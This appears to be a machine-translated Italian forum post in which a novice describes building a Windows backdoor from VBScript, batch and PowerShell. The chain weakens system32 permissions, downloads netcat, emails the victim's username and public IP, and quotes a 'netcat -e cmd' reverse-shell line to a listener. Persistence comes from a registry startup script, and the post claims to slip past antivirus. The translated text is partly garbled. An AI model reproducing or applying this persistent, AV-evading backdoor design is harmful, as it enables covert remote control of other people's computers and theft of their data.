Sono abbastanza nuovo in questo tipo di cose e sto sperimentando un po '. Questo fine settimana ho avuto un po 'di tempo libero e ho deciso di scherzare con VBScript e PowerShell. Quello che ho fatto è che ho scritto un VBScript che può essere eseguito come utente normale o come amministratore e come segue esegue:
-
Crea uno script .bat e inserisce manualmente il codice nello script riga per riga e poi lo esegue. .Bat contiene:
- Un comando takeown per system32, sysWOW64 (se eseguito come amministratore, ovviamente)
- Un comando icacls che rende le suddette cartelle modificabili da chiunque
- Esegue lo script PowerShell precedentemente creato
- Aggiunge un .vbs nel registro macchina locale per essere eseguito all'avvio come sistema
-
Crea uno script PowerShell e inserisce il codice manualmente nello script riga per riga. Il .ps1 contiene:
- Prima scarica netcat
- Quindi procede alla decompressione del file scaricato
- Quindi acquisisce il nome utente del sistema e l'ip pubblico
- Invia i dati tramite smtp a un indirizzo email specificato
- Finalmente esegue netcat.exe con argomenti: "netcat.exe -e cmd {server di ascolto pubblico ip} {porta}"
-
Crea un altro .vbs e inserisce il codice riga per riga manualmente (che verrà eseguito all'avvio come indicato nel .bat). Il .vbs contiene:
- Un ciclo while che ogni 5 minuti esegue un file .bat che contiene "netcat.exe -e cmd {server di ascolto public ip} {port}" come comando (quindi posso avere una backdoor persistente)
-
Un file .bat che contiene un solo comando:
- "netcat.exe -e cmd {server di ascolto public ip} {port}"
-
Esegui .bat sullo sfondo nascosto dall'utente
Sul lato "attacker" ho aperto netcat in ascolto sulla porta specificata. Sono stato in grado di ottenere un elevato cmd senza alcun innesco di AV (testato con Avira, ESET).
Funziona su Windows 7, 8, 10 x64 e ho fatto supportare sia powershell v. < 3 and v. > 3.
Ciò che ho ottenuto è un elevato cmd con persistenza senza attivazione del rilevamento AV e sembrava molto facile da raggiungere.
Se questo è stato rilevato come potenziale minaccia dal software antivirus e rimosso dal sistema? Sono in grado di eseguire l'esecuzione di codice in modalità remota e ottenere l'accesso completo al sistema di destinazione
Questo progetto è stato eseguito in un ambiente locale che possiedo. Non ho intenzione di nient'altro